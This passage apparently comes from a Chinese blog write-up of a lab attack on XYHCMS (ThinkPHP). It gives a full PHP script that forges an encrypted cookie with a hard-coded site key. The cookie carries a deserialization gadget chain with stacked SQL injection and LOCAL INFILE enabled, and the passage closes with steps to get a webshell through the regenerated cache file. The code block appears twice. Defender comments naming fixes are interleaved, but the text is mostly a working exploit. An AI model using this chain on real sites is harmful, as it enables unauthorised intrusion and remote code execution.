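         * Applying it twice with the same key is the identity.
         *
         * @param string $txt         bytes to transform
         * @param string $encrypt_key key material
         * @return string
         */
        private function __key($txt, $encrypt_key) {
            $stream = md5($encrypt_key);
            $streamLen = strlen($stream);
            $out = '';
            $len = strlen($txt);
            for ($i = 0; $i < $len; $i++) {
                $out .= $txt[$i] ^ $stream[$i % $streamLen];
            }
            return $out;
        }

        // Drop the key reference when the object goes away.
        public function __destruct() {
            $this->crypt_key = null;
        }
    }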
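    /**
     * Decrypt a cookie-style value and unserialize it (harness: value passed directly).
     *
     * @param string $name ciphertext produced by set_cookie()
     * @param string $key  site key (CFG_COOKIE_ENCODE); '' uses the dumped lab key
     *                     (previously this parameter was silently ignored)
     * @return mixed
     */
    function get_cookie($name, $key = '') {
        $key = $key === '' ? 'UQAz3abDl' : $key;
        $sc = new \Common\Lib\SysCrypt(md5($key));
        $value = $sc->php_decrypt($name);
        // Same sink as the CMS: any class can be instantiated from the decrypted bytes.
        // The CMS-side fix is unserialize($value, ['allowed_classes' => false]) plus an
        // integrity check (HMAC) on the cookie.
        return unserialize($value);
    }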
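    /**
     * Serialize $args and encrypt it the way the CMS builds a cookie value.
     *
     * @param mixed  $args value to store (the CMS documents it as an array)
     * @param string $key  site key; '' uses the dumped lab key (previously this
     *                     parameter was silently ignored)
     * @return string base64 ciphertext
     */
    function set_cookie($args, $key = '') {
        $key = $key === '' ? 'UQAz3abDl' : $key;
        $sc = new \Common\Lib\SysCrypt(md5($key));
        return $sc->php_encrypt(serialize($args));
    }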
    
    // Build the nested object graph and encode it exactly as the CMS encodes a cookie.
    $b = new \Think\Image\Driver\Imagick();
    $a = set_cookie($b,'');
    // '+' is the one base64 character that form/URL decoding turns into a space, so
    // it is percent-encoded before the value is submitted. Defender: rejecting object
    // payloads at the unserialize() sink (allowed_classes => false) neutralises this
    // value regardless of how it is delivered.
    echo str_replace('+','%2B',$a);
    

    成功添加用户
    后台getshell

    
    
    
    namespace Think\Db\Driver;
    use PDO;
    // Stand-in for the framework's MySQL driver, declaring only the properties
    // that get serialized; no framework code runs locally.
    class Mysql{
    // Client-side PDO switch that permits a server-initiated LOCAL INFILE read.
    // Defender: keep MYSQL_ATTR_LOCAL_INFILE off (PDO's default) unless a
    // feature needs it, and never let connection settings come from
    // user-controlled data.
    protected $options = array(
    PDO::MYSQL_ATTR_LOCAL_INFILE => true
    );
    // Connection parameters for the target's own database.
    protected $config = array(
    "dsn" => "mysql:host=127.0.0.1;dbname=xyhcms;port=3306",
    "username" => "root",
    "password" => "123456"
    );
    }
    namespace Think;
    // Stand-in for the framework's base Model, holding only the properties the
    // target's unserialize() will restore.
    class Model{
    protected $options = array();
    protected $pk;
    protected $data = array();
    protected $db = null;
    public function __construct(){
    // Driver object carrying the connection settings above.
    $this->db = new \Think\Db\Driver\Mysql();
    $this->options['where'] = '';
    $this->pk = 'luoke';
    // 'where' carries a stacked ALTER TABLE after the id predicate. The column
    // name between the backticks is empty in this rendering - most likely
    // markup stripped by the page renderer; it is not recoverable here.
    // Defender: bound parameters plus PDO::ATTR_EMULATE_PREPARES => false
    // block stacked statements, and allowed_classes => false at the cookie
    // sink stops the chain before it gets here.
    $this->data[$this->pk] = array(
    "table" => "xyh_admin_log",
    "where" => "id=0; alter table xyh_guestbook add column `` varchar(10);",
    );
    }
    }
    namespace Think\Session\Driver;
    // Session-driver stand-in: its only role in the payload is to hold the
    // Model object as $handle.
    class Memcache{
    protected $handle;
    public function __construct() {
    $this->handle = new \Think\Model();
    }
    }
    namespace Think\Image\Driver;
    // Outermost object of the payload; wraps Memcache in a private $img. The
    // framework-side lifecycle methods that walk this chain after
    // unserialize() are not shown on this page.
    class Imagick{
    private $img;
    public function __construct() {
    $this->img = new \Think\Session\Driver\Memcache();
    }
    }
    namespace Common\Lib;
    class SysCrypt{
        // Outer key; __key() derives the real keystream from md5() of it.
        private $crypt_key;

        /**
         * @param string $crypt_key outer key (callers on this page pass md5(site key))
         */
        public function __construct($crypt_key) {
            $this->crypt_key = $crypt_key;
        }

        /**
         * Obfuscate $txt. A fresh 32-char md5 pad (seeded from rand(), so the output
         * differs per call) is XORed byte-wise into the plaintext and interleaved with
         * it (pad byte, then pad ^ plain); the doubled string is XORed with
         * md5($crypt_key) and base64-encoded.
         *
         * Security note: fixed-keystream XOR with no MAC. Anyone who knows the key can
         * forge values, and flipping a ciphertext bit flips the matching plaintext bit.
         * This is not authenticated encryption and gives no integrity.
         *
         * @param string $txt plaintext
         * @return string base64 ciphertext
         */
        public function php_encrypt($txt) {
            srand((double)microtime() * 1000000);
            $pad = md5(rand(0, 32000));
            $padLen = strlen($pad);
            $doubled = '';
            $j = 0;
            $len = strlen($txt);
            for ($i = 0; $i < $len; $i++) {
                if ($j == $padLen) {
                    $j = 0;
                }
                $doubled .= $pad[$j] . ($txt[$i] ^ $pad[$j]);
                $j++;
            }
            return base64_encode($this->__key($doubled, $this->crypt_key));
        }

        /**
         * Inverse of php_encrypt(): undo the outer XOR, then recover each plaintext byte
         * from its (pad, pad ^ plain) pair. An odd-length buffer reads one byte past the
         * end on the last pair, exactly as the original loop does.
         *
         * @param string $txt base64 ciphertext
         * @return string plaintext
         */
        public function php_decrypt($txt) {
            $doubled = $this->__key(base64_decode($txt), $this->crypt_key);
            $plain = '';
            $len = strlen($doubled);
            for ($i = 0; $i < $len; $i += 2) {
                $plain .= $doubled[$i + 1] ^ $doubled[$i];
            }
            return $plain;
        }

        /**
         * Repeating-key XOR of $txt with md5($encrypt_key) (32 hex chars, cycled).
         * Applying it twice with the same key is the identity.
         *
         * @param string $txt         bytes to transform
         * @param string $encrypt_key key material
         * @return string
         */
        private function __key($txt, $encrypt_key) {
            $stream = md5($encrypt_key);
            $streamLen = strlen($stream);
            $out = '';
            $len = strlen($txt);
            for ($i = 0; $i < $len; $i++) {
                $out .= $txt[$i] ^ $stream[$i % $streamLen];
            }
            return $out;
        }

        // Drop the key reference when the object goes away.
        public function __destruct() {
            $this->crypt_key = null;
        }
    }
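    /**
     * Decrypt a cookie-style value and unserialize it (harness: value passed directly).
     *
     * @param string $name ciphertext produced by set_cookie()
     * @param string $key  site key (CFG_COOKIE_ENCODE); '' uses the dumped lab key
     *                     (previously this parameter was silently ignored)
     * @return mixed
     */
    function get_cookie($name, $key = '') {
        $key = $key === '' ? 'UQAz3abDl' : $key;
        $sc = new \Common\Lib\SysCrypt(md5($key));
        $value = $sc->php_decrypt($name);
        // Same sink as the CMS: any class can be instantiated from the decrypted bytes.
        // The CMS-side fix is unserialize($value, ['allowed_classes' => false]) plus an
        // integrity check (HMAC) on the cookie.
        return unserialize($value);
    }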
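    /**
     * Serialize $args and encrypt it the way the CMS builds a cookie value.
     *
     * @param mixed  $args value to store (the CMS documents it as an array)
     * @param string $key  site key; '' uses the dumped lab key (previously this
     *                     parameter was silently ignored)
     * @return string base64 ciphertext
     */
    function set_cookie($args, $key = '') {
        $key = $key === '' ? 'UQAz3abDl' : $key;
        $sc = new \Common\Lib\SysCrypt(md5($key));
        return $sc->php_encrypt(serialize($args));
    }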
    // Build the nested object graph and encode it exactly as the CMS encodes a cookie.
    $b = new \Think\Image\Driver\Imagick();
    $a = set_cookie($b,'');
    // '+' is the one base64 character that form/URL decoding turns into a space, so
    // it is percent-encoded before the value is submitted. Defender: rejecting object
    // payloads at the unserialize() sink (allowed_classes => false) neutralises this
    // value regardless of how it is delivered.
    echo str_replace('+','%2B',$a);
    
    ?>
    
    • 106

    在后台清理缓存，访问 http://192.168.0.160//index.php?s=/Guestbook/index.html 生成缓存，再访问下面的地址。
    终于进来了。
    在后台清理缓存 访问 http://192.168.0.160//index.php?s=/Guestbook/index.html生成缓存再访问

    http://192.168.0.160/App/Runtime/Data/3277c100b8afcccfb950d28a6ff7113c__fields/www_xycms_com.xyh_guestbook.php

  • 原文地址:https://blog.csdn.net/qq_42307546/article/details/133094095